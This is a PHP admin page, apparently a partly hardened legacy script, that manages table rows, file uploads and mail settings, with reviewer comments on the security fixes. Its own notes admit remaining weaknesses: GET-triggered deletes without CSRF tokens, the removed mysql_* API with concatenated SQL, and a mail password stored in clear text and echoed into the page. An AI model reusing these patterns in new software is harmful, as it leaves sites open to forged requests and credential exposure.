files >> /home/hrdigest/public_html/admin/autoform.php
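<?php
// *****Copy right 2003 ,TNS NETWORK LTD.,PART.***** //
/*
 * autoform.php - generic admin list / add / edit / settings page for the table
 * named by the `tb` request parameter.
 *
 * Request handling (top of file):
 *   GET  action=Delete|remove|remove2  -> mutate a row / delete an uploaded file, then redirect
 *   POST action=Add|Update|setting     -> build an INSERT/UPDATE from the posted fields and uploads
 * Rendering (bottom of file):
 *   no action -> paged listing, Add -> blank form, Edit -> filled form, setting -> mail settings form
 *
 * Every value taken from $_GET/$_POST/$_FILES is treated as untrusted, even though
 * checkid() runs first: identifiers are validated before being placed between
 * backticks, values are escaped for SQL, file names are confined to the upload
 * directory, and everything echoed into HTML/JS/URLs is encoded for that context.
 *
 * NOTE(review): Delete/remove/remove2 change state on a plain GET and no request
 * carries an anti-CSRF token. Fixing that needs a session-bound token checked here
 * and emitted by every form/link; the session layer is not visible in this file.
 * NOTE(review): the mysql_* API is kept because the connection is presumably opened
 * in ../inc/function_admin.php (the bare mysql_query() calls imply a default link).
 * Migrating to PDO/mysqli prepared statements has to start there.
 */
require("../inc/function_admin.php");
checkid(); // presumably the admin login check - defined in function_admin.php, confirm

/* Return $source[$key] when it is a string, otherwise "". Avoids notices and array-typed parameters. */
function autoform_param($source, $key)
{
    return (isset($source[$key]) && is_string($source[$key])) ? $source[$key] : "";
}

/*
 * Return $name wrapped in backticks for use as a table/column name, or false when it
 * cannot be used safely. Backticks and control characters are rejected outright, so
 * the value can never close the quoted identifier.
 */
function autoform_ident($name)
{
    if (!is_string($name) || !preg_match('/^[^\x00-\x1f`]{1,64}$/', $name)) {
        return false;
    }
    return "`" . $name . "`";
}

/* Escape a value for use inside a single-quoted SQL string literal. */
function autoform_sql($value)
{
    return mysql_real_escape_string((string)$value);
}

/* Encode a value for HTML text and attribute context. */
function autoform_h($value)
{
    return htmlspecialchars((string)$value, ENT_QUOTES, "UTF-8");
}

/* Encode a value as a JavaScript string literal that is safe inside an HTML attribute. */
function autoform_js($value)
{
    return autoform_h(json_encode((string)$value));
}

/* Map a stored file name to its path inside the upload directory; false if the name is unusable. */
function autoform_upload_path($name)
{
    $name = (string)$name;
    if (strpos($name, "\0") !== false) {
        return false;
    }
    $name = basename($name); // drop any directory part so the path cannot leave images/webpage
    if ($name === "" || $name === "." || $name === "..") {
        return false;
    }
    return "../images/webpage/" . $name;
}

/* Display label for a column: the "_s" suffix is stripped only when it really is a suffix. */
function autoform_label($column)
{
    if (strlen($column) > 2 && substr($column, -2) === "_s") {
        return substr($column, 0, -2);
    }
    return $column;
}

/* Abort the request before any output with a 400 and an encoded message. */
function autoform_fail($message)
{
    header("HTTP/1.1 400 Bad Request");
    die(autoform_h($message));
}

$action    = autoform_param($_GET, "action");
$tb        = autoform_param($_GET, "tb");
$id_raw    = autoform_param($_GET, "id");
$tb_sql    = autoform_ident($tb);
$tb_url    = urlencode($tb);
$cname     = autoform_param($_GET, "cname");
$cname_url = urlencode($cname);
$id_url    = urlencode($id_raw);
$show_url  = urlencode(autoform_param($_GET, "show"));

if ($tb_sql === false) {
    autoform_fail("Invalid table name");
}

if ($action === "Delete" && !empty($id_raw)) {
    mysql_query("Delete From $tb_sql Where `id` = '" . autoform_sql($id_raw) . "'");
    @header("Location: autoform.php?tb=$tb_url&cname=$cname_url");
    exit;
}

if ($action === "remove") {
    $na_sql = autoform_ident(autoform_param($_GET, "na"));
    if ($na_sql === false) {
        autoform_fail("Invalid column name");
    }
    // The file name arrives in the query string, so it is confined to the upload directory.
    $im_path = autoform_upload_path(autoform_param($_GET, "im"));
    if ($im_path !== false) {
        @unlink($im_path);
    }
    mysql_query("Update $tb_sql Set $na_sql = '' Where `id` = '" . autoform_sql($id_raw) . "' ") or die ("Can't Perform Query 0");
    header("Location: autoform.php?tb=$tb_url&cname=$cname_url&action=Edit&id=$id_url");
    exit;
}

if ($action === "remove2") {
    $tb2_sql = autoform_ident($tb . "_setting");
    if ($tb2_sql === false) {
        autoform_fail("Invalid table name");
    }
    // The original tested $row["logo"] before any row had been fetched, so the logo
    // file was never deleted. Read the stored name first, then clear the column.
    $logo_res = mysql_query("Select `logo` From $tb2_sql Where `id` = '1' ");
    $logo_row = $logo_res ? mysql_fetch_array($logo_res) : false;
    if (!empty($logo_row["logo"])) {
        $logo_path = autoform_upload_path($logo_row["logo"]);
        if ($logo_path !== false) {
            @unlink($logo_path);
        }
    }
    mysql_query("Update $tb2_sql Set `logo` = '' Where `id` = '1' ");
    header("Location: autoform.php?tb=$tb_url&cname=$cname_url&action=setting&id=$id_url");
    exit;
}

if (!empty($_POST["action"])) {
    $post_action = autoform_param($_POST, "action");
    $post_tb     = autoform_param($_POST, "tb");
    $post_tb_sql = autoform_ident($post_tb);
    if ($post_tb_sql === false) {
        autoform_fail("Invalid table name");
    }
    $post_id_sql = autoform_sql(autoform_param($_POST, "id"));

    // Form plumbing fields that are never written to the table.
    $skip_fields = array("Submit", "action", "id", "tb", "images", "default_page", "submit");

    $columns     = array(); // quoted column names, in insert order
    $values      = array(); // matching quoted values
    $assignments = array(); // "`col` = 'value'" pairs for UPDATE

    foreach ($_POST as $field => $raw) {
        $field = (string)$field;
        if (in_array($field, $skip_fields, true) || !is_string($raw)) {
            continue;
        }
        $column = autoform_ident($field);
        if ($column === false) {
            continue; // a field name that cannot be a safe column name is ignored
        }
        // stripslashes() is kept so stored values match what the original code stored;
        // the escaping itself is now done by the database driver, not addslashes().
        $value = "'" . autoform_sql(stripslashes($raw)) . "'";
        $columns[]     = $column;
        $values[]      = $value;
        $assignments[] = "$column = $value";
    }

    // Only these extensions may be written into the web-reachable upload directory.
    // The original kept whatever extension the client sent, so a server-executable
    // file type could be stored. TODO adjust the list to the file types the forms need.
    $allowed_ext = array("jpg", "jpeg", "png", "gif", "bmp", "pdf", "doc", "docx", "xls", "xlsx", "txt");

    // Old file names to delete on replace; the original relied on register_globals for $images.
    $old_files = (isset($_POST["images"]) && is_array($_POST["images"])) ? $_POST["images"] : array();

    foreach ($_FILES as $Picture => $upload) {
        $Picture = (string)$Picture;
        $column  = autoform_ident($Picture);
        if ($column === false || !is_array($upload)
            || !isset($upload["tmp_name"]) || !is_string($upload["tmp_name"]) || $upload["tmp_name"] === ""
            || !isset($upload["name"]) || !is_string($upload["name"])) {
            continue;
        }
        if (!is_uploaded_file($upload["tmp_name"])) {
            continue;
        }
        $parts     = explode(".", str_replace(" ", "", $upload["name"]));
        $extension = strtolower($parts[count($parts) - 1]);
        if (!in_array($extension, $allowed_ext, true)) {
            continue;
        }
        // Same naming scheme as before: first and last four hex digits of an md5.
        $md5      = md5(time() . $Picture);
        $new_name = substr($md5, 0, 4) . substr($md5, -4, 4) . "." . $extension;
        if (!@move_uploaded_file($upload["tmp_name"], "../images/webpage/" . $new_name)) {
            continue; // do not record a file that was not stored
        }
        if (!empty($old_files[$Picture]) && is_string($old_files[$Picture])) {
            $old_path = autoform_upload_path($old_files[$Picture]);
            if ($old_path !== false && basename($old_path) !== $new_name) {
                @unlink($old_path);
            }
        }
        $name_sql      = "'" . autoform_sql($new_name) . "'";
        $columns[]     = $column;
        $values[]      = $name_sql;
        $assignments[] = "$column = $name_sql";
    }

    if ($post_action === "Add") {
        if (count($columns) > 0) {
            mysql_query("Insert Into $post_tb_sql ( " . implode(" , ", $columns) . " ) Values ( " . implode(" , ", $values) . " )");
        }
        @header("Location: autoform.php?tb=" . urlencode($post_tb) . "&cname=$cname_url");
        exit;
    } elseif ($post_action === "Update") {
        if (count($assignments) > 0) {
            mysql_query("Update $post_tb_sql Set " . implode(" , ", $assignments) . " Where `id` = '$post_id_sql'");
        }
        // No redirect: the page re-renders below using the query string of the posting form.
    } elseif ($post_action === "setting") {
        $tb2_sql = autoform_ident($post_tb . "_setting");
        if ($tb2_sql === false) {
            autoform_fail("Invalid table name");
        }
        $count_res = mysql_query("Select * From $tb2_sql ");
        $num = $count_res ? mysql_num_rows($count_res) : 0;
        if ($num == 0) {
            mysql_query("Insert Into $tb2_sql ( " . implode(" , ", array_merge(array("`id`"), $columns)) . " ) Values ( " . implode(" , ", array_merge(array("'1'"), $values)) . " )");
        } elseif (count($assignments) > 0) {
            mysql_query("Update $tb2_sql Set " . implode(" , ", $assignments) . " Where `id` = '$post_id_sql'");
        }
    }
} // End If
?>
<html>
<head>
<?php require("../inc/title.php") ?>
<link href="index.css" rel="stylesheet" type="text/css">
<script language="javascript" type="text/javascript">
<!--
// The PHP values below are URL-encoded, which is also safe inside a JS string literal.
function Delete(id){
	if(confirm("คุณต้องการลบข้อมูลนี้หรือไม่ ?")){
		if(confirm("ยืนยันการลบอีกครั้ง ?")){
			location = "autoform.php?tb=<?php echo $tb_url ?>&action=Delete&id=" + encodeURIComponent(id) + "&cname=<?php echo $cname_url ?>";
		}
	}
}
function remove(id,im,na){
	if(confirm("คุณต้องการลบข้อมูลนี้หรือไม่ ?")){
		if(confirm("ยืนยันการลบอีกครั้ง ?")){
			location = "autoform.php?tb=<?php echo $tb_url ?>&action=remove&id=" + encodeURIComponent(id) + "&im=" + encodeURIComponent(im) + "&na=" + encodeURIComponent(na) + "&cname=<?php echo $cname_url ?>";
		}
	}
}
function remove2(id){
	if(confirm("คุณต้องการลบข้อมูลนี้หรือไม่ ?")){
		if(confirm("ยืนยันการลบอีกครั้ง ?")){
			location = "autoform.php?tb=<?php echo $tb_url ?>&action=remove2&id=" + encodeURIComponent(id);
		}
	}
}
-->
</script>
<script language="JavaScript" type="text/javascript" src="wysiwyg.js"></script>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body bgcolor="#ffffff">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td valign="top"><?php top_page() ?></td>
  </tr>
</table>
<table width="100%" height="100%" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="200" valign="top" background="icon/bgbar.jpg"><?php require("menu.php") ?></td>
    <td valign="top"><table width="95%" border="0" align="center" cellpadding="0" cellspacing="0">
      <tr>
        <td valign="top"><table width="100%" border="0" cellpadding="5" cellspacing="0" class="main">
          <tr>
            <td><b>:: <?php echo autoform_h($cname) ?> ::</b></td>
          </tr>
        </table>
<?php
// $php_board, $show, $maxshow and $num stay global: nextpage.php presumably reads them - confirm.
$sort_raw  = autoform_param($_GET, "sort");
$php_board = "autoform.php?tb=$tb_url&cname=$cname_url&sort=" . urlencode($sort_raw);

// Both values go into LIMIT unquoted, so they must be integers.
$show = empty($_GET["show"]) ? 0 : max(0, (int)$_GET["show"]);
$maxshow = empty($_GET["maxshow"]) ? 15 : (int)$_GET["maxshow"];
if ($maxshow < 1) {
    $maxshow = 15;
}

if (empty($action)) {
    $sort_sql = ($sort_raw !== "") ? autoform_ident($sort_raw) : false;
    if ($sort_sql !== false) {
        $show_sort = " $sort_sql Asc ";
    } else {
        $show_sort = " `id` Desc ";
    }
    $result = mysql_query("Select * From $tb_sql Order By $show_sort Limit $show , $maxshow");
    $num = mysql_num_rows(mysql_query("Select * From $tb_sql "));
    // Columns whose name matches '%_s' are the ones shown in the listing.
    $result_col = mysql_query("SHOW COLUMNS FROM $tb_sql where `Field` like '%_s' ");
    $num_col = mysql_num_rows($result_col);

    $tb2_sql = autoform_ident($tb . "_setting");
    $rmail = ($tb2_sql === false) ? false : @mysql_fetch_array(mysql_query("Select * From $tb2_sql Where `id` = '1' "));
?>
        <table width="100%" border="0" cellpadding="5" cellspacing="0" class="main">
          <tr>
            <td><?php if (empty($rmail["subject"]) || empty($rmail["fmail"])) { ?>
              <font color="#FF0000">* ยังไม่มีการเซต E-mail ผู้ส่ง</font>
            <?php } ?></td>
            <td align="right"><a href="autoform.php?tb=<?php echo $tb_url ?>&action=Add&cname=<?php echo $cname_url ?>&show=<?php echo $show_url ?>">Add New <?php echo autoform_h($cname) ?></a> | <a href="autoform.php?tb=<?php echo $tb_url ?>&action=setting&cname=<?php echo $cname_url ?>&show=<?php echo $show_url ?>">E-mail Setting</a> | <a href="to_excel.php?tb=<?php echo $tb_url ?>" target="_blank">Export To Excel &gt; </a></td>
          </tr>
        </table>
        <table width="100%" border="0" cellpadding="5" cellspacing="1" class="main border1">
          <tr style="background:#0099cc; color:#ffffff;">
<?php
    $name_col = array();
    $i_col = 1;
    while ($row_col = mysql_fetch_row($result_col)) {
        $name_col[$i_col] = $row_col[0];
        $i_col++;
        $e_col = autoform_label($row_col[0]);
?>
            <td width="100" class="border4"><a href="autoform.php?tb=<?php echo $tb_url ?>&cname=<?php echo $cname_url ?>&sort=<?php echo urlencode($row_col[0]) ?>"><font color="#FFFFFF"><?php echo autoform_h($e_col) ?></font></a></td>
<?php } ?>
            <td width="50" class="" align="center">Option </td>
          </tr>
<?php while ($row = mysql_fetch_array($result)) { ?>
          <tr onMouseOver="style.backgroundColor='#feedc7';" onMouseOut="style.backgroundColor='#FFFFFF';">
<?php
        for ($i_col2 = 1; $i_col2 <= $num_col; $i_col2++) {
            $i_name = $name_col[$i_col2];
            // Row data may come from public form submissions, so it is encoded before display.
?>
            <td class="border2 border4"><?php echo autoform_h($row[$i_name]) ?> </td>
<?php } ?>
            <td class="border2" align="center"><a href="autoform.php?tb=<?php echo $tb_url ?>&action=Edit&id=<?php echo urlencode($row["id"]) ?>&cname=<?php echo $cname_url ?>&show=<?php echo $show_url ?>"><img src="icon/show.gif" border="0" /></a> <a href="#" onClick="Delete(<?php echo autoform_js($row["id"]) ?>); return false;"><img src="icon/del.gif" border="0" /></a></td>
          </tr>
<?php } ?>
        </table>
        <?php include("nextpage.php") ?>
<?php
} elseif ($action === "Add") {
?>
        <form method="post" enctype="multipart/form-data" >
        <table width="100%" border="0" align="center" cellpadding="5" cellspacing="0" class="main">
          <tr>
            <td><strong>Add New <?php echo autoform_h($cname) ?></strong></td>
          </tr>
        </table>
        <table width="100%" border="0" align="center" cellpadding="3" cellspacing="1" class="main border1">
<?php
    $result_col = mysql_query("SHOW COLUMNS FROM $tb_sql ");
    $num_col = mysql_num_rows($result_col);
    while ($row_col = mysql_fetch_row($result_col)) {
        $e_col = autoform_label($row_col[0]);
        if ($row_col[0] == "id") {
            continue; // the id column is not editable
        }
?>
          <tr>
            <td width="19%" class="border2 border4"><?php echo autoform_h($e_col) ?></td>
            <td width="81%" class="border2">
<?php if (strpos($e_col, "file") !== false) { // columns with "file" in the name are uploads ?>
              <input name="<?php echo autoform_h($row_col[0]) ?>" type="file" class="main" id="<?php echo autoform_h($row_col[0]) ?>">
<?php } else { ?>
              <input type="text" name="<?php echo autoform_h($row_col[0]) ?>" value="" class="main" style="width:300px;" />
<?php } ?>
            </td>
          </tr>
<?php } ?>
          <tr>
            <td class="border2 border4"> </td>
            <td class="border2"><input type="submit" value="Add New Data" class="main" style="width:200px;" />
              <input type="button" value="Back" class="main" style="width:80px;" onClick="location='autoform.php?tb=<?php echo $tb_url ?>&cname=<?php echo $cname_url ?>';" />
              <input type="hidden" name="action" value="Add" />
              <input name="tb" type="hidden" id="tb" value="<?php echo autoform_h($tb) ?>" /></td>
          </tr>
        </table>
        </form>
<?php
} elseif ($action === "Edit" && $row = mysql_fetch_array(mysql_query("Select * From $tb_sql Where `id` = '" . autoform_sql($id_raw) . "'"))) {
    $result_col = mysql_query("SHOW COLUMNS FROM $tb_sql ");
    $num_col = mysql_num_rows($result_col);
?>
        <form method="post" enctype="multipart/form-data">
        <table width="100%" border="0" align="center" cellpadding="5" cellspacing="0" class="main">
          <tr>
            <td><strong>Edit Data <?php echo autoform_h($cname) ?></strong></td>
          </tr>
        </table>
        <table width="100%" border="0" align="center" cellpadding="3" cellspacing="1" class="main border1">
<?php
    while ($row_col = mysql_fetch_row($result_col)) {
        $n_col = $row_col[0];
        $e_col = autoform_label($n_col);
?>
          <tr>
            <td width="187" class="border2 border4"><?php echo autoform_h($e_col) ?></td>
            <td width="790" class="border2">
<?php if ($n_col == "id") { ?>
              <?php echo autoform_h($row[$n_col]) ?>
<?php } elseif (strpos($e_col, "file") !== false) { ?>
              <input name="<?php echo autoform_h($n_col) ?>" type="file" class="main" id="<?php echo autoform_h($n_col) ?>">
<?php if (!empty($row[$n_col])) { ?>
              <a href="../images/webpage/<?php echo autoform_h(rawurlencode(basename($row[$n_col]))) ?>" target="_blank"><img src="icon/b_image.gif" border="0" /></a> : <img style="cursor:pointer;" src="icon/del.gif" border="0" onClick="remove(<?php echo autoform_js($row["id"]) ?> , <?php echo autoform_js($row[$n_col]) ?> , <?php echo autoform_js($n_col) ?>);" />
<?php } ?>
<?php } else { ?>
              <input type="text" name="<?php echo autoform_h($n_col) ?>" value="<?php echo autoform_h($row[$n_col]) ?>" class="main" style="width:300px;" />
<?php } ?>
            </td>
          </tr>
<?php } ?>
          <tr>
            <td class="border2 border4"> </td>
            <td class="border2"><input type="submit" value=" Update " class="main" style="width:80px;" />
              <input type="button" value="Back" class="main" style="width:80px;" onClick="location='autoform.php?tb=<?php echo $tb_url ?>&cname=<?php echo $cname_url ?>&show=<?php echo $show_url ?>';" />
              <input type="hidden" name="action" value="Update" />
              <input name="tb" type="hidden" id="tb" value="<?php echo autoform_h($tb) ?>" />
              <input name="id" type="hidden" id="id" value="<?php echo autoform_h($id_raw) ?>" /></td>
          </tr>
        </table>
        </form>
        <p>
<?php
} elseif ($action === "setting") {
?>
        </p>
        <table width="100%" border="0" cellspacing="0" cellpadding="0">
          <tr>
            <td width="80%"> </td>
            <td width="20%" align="center"><div style="padding:5px 10px 5px 10px;background:#CCC;color:#FFF;"><a href="autoform.php?tb=<?php echo $tb_url ?>">BACK TO CONTACT</a></div></td>
          </tr>
        </table>
<?php
    // NOTE(review): the form is filled from `form_contact_setting`, while saving and
    // remove2 write to `<tb>_setting`. Kept as in the original - confirm which is intended.
    $row = mysql_fetch_array(mysql_query("Select * From `form_contact_setting` Where `id`='1' "));
    $mtype = isset($row["mtype"]) ? $row["mtype"] : null;
?>
        <form action="" method="post" enctype="multipart/form-data" name="form1" id="form1">
        <table width="100%" border="0" cellspacing="2" cellpadding="2" style="font-size: 13px; font-weight: bold;">
          <tr>
            <td valign="top" bgcolor="#E1E1E1">Company SETTING</td>
            <td bgcolor="#E1E1E1"> </td>
          </tr>
          <tr>
            <td valign="top">Company</td>
            <td><input name="companyname" type="text" id="companyname" size="80" value="<?php echo autoform_h(autoform_param($row, "companyname")) ?>" /></td>
          </tr>
          <tr>
            <td valign="top">Address</td>
            <td><input name="address" type="text" id="address" size="80" value="<?php echo autoform_h(autoform_param($row, "address")) ?>" /></td>
          </tr>
          <tr>
            <td valign="top">Logo </td>
            <td><label for="logo"></label>
              <input type="file" name="logo" id="logo" />
<?php if (!empty($row["logo"])) { ?>
              <a href="../images/webpage/<?php echo autoform_h(rawurlencode(basename($row["logo"]))) ?>" target="_blank"><img src="icon/image.gif" alt="View Image" border="0" width="16" height="16" /></a><a href="#" onClick="remove2(<?php echo autoform_js($row["id"]) ?>); return false;"><img src="icon/delete.gif" alt="Remove Image" border="0" width="16" height="16" /></a>
<?php } ?></td>
          </tr>
          <tr>
            <td valign="top" bgcolor="#E1E1E1">E-mail SETTING</td>
            <td bgcolor="#E1E1E1"> </td>
          </tr>
          <tr>
            <td width="15%" valign="top">Subject</td>
            <td width="85%"><label for="subject">
              <input name="subject" type="text" id="subject" size="80" value="<?php echo autoform_h(autoform_param($row, "subject")) ?>" />
            </label></td>
          </tr>
          <tr>
            <td valign="top">To</td>
            <td>Customer</td>
          </tr>
          <tr>
            <td valign="top">From Name</td>
            <td><input name="fname" type="text" id="fname" size="80" value="<?php echo autoform_h(autoform_param($row, "fname")) ?>" /></td>
          </tr>
          <tr>
            <td valign="top">From Mail</td>
            <td><input name="fmail" type="text" id="fmail" size="80" value="<?php echo autoform_h(autoform_param($row, "fmail")) ?>"/></td>
          </tr>
          <tr>
            <td valign="top">Reply To</td>
            <td><input name="bcc" type="text" id="bcc" size="80" value="<?php echo autoform_h(autoform_param($row, "bcc")) ?>" /></td>
          </tr>
          <tr>
            <td valign="top">Detail</td>
            <td><textarea name="detail" cols="80" rows="10" id="detail"><?php echo autoform_h(autoform_param($row, "detail")) ?> </textarea>
              <script language="javascript1.2">generate_wysiwyg('detail');</script></td>
          </tr>
          <tr>
            <td valign="top">Function</td>
            <td><label for="mtype">
              <input name="mtype" type="radio" id="radio" value="0" <?php if ($mtype == 0) { ?> checked="checked" <?php } ?> />
              Function mail</label>
              <label for="mtype">
              <input type="radio" name="mtype" id="radio" value="1" <?php if ($mtype == 1) { ?> checked="checked" <?php } ?> />
              Function PHPmailer</label></td>
          </tr>
          <tr>
            <td valign="top" bgcolor="#E1E1E1">PHP mailer Setting</td>
            <td bgcolor="#E1E1E1"> </td>
          </tr>
          <tr>
            <td valign="top">Mail Server</td>
            <td><input name="host" type="text" id="host" size="80" value="<?php echo autoform_h(autoform_param($row, "host")) ?>" /></td>
          </tr>
          <tr>
            <td valign="top">E-mail</td>
            <td><input name="acc_email" type="text" id="acc_email" size="80" value="<?php echo autoform_h(autoform_param($row, "acc_email")) ?>" /></td>
          </tr>
          <tr>
            <td valign="top">Password</td>
            <?php // NOTE(review): the mail account password is stored in clear text and sent back in the page source. ?>
            <td><input name="acc_password" type="password" id="acc_password" size="80" value="<?php echo autoform_h(autoform_param($row, "acc_password")) ?>" /></td>
          </tr>
          <tr>
            <td valign="top"> </td>
            <td> </td>
          </tr>
          <tr>
            <td valign="top"> </td>
            <td><input type="submit" name="Submit" id="Submit" value=" SAVE DATA " />
              <input name="action" type="hidden" id="action" value="setting" />
              <input name="id" type="hidden" id="id" value="1" />
              <input name="ctime" type="hidden" id="ctime" value="<?php echo date("Y-m-d H:i:s") ?>" />
              <span class="border2">
              <input name="tb" type="hidden" id="tb" value="<?php echo autoform_h($tb) ?>" />
              </span></td>
          </tr>
        </table>
        </form>
<?php } ?></td>
      </tr>
    </table></td>
  </tr>
</table>
</body>
</html>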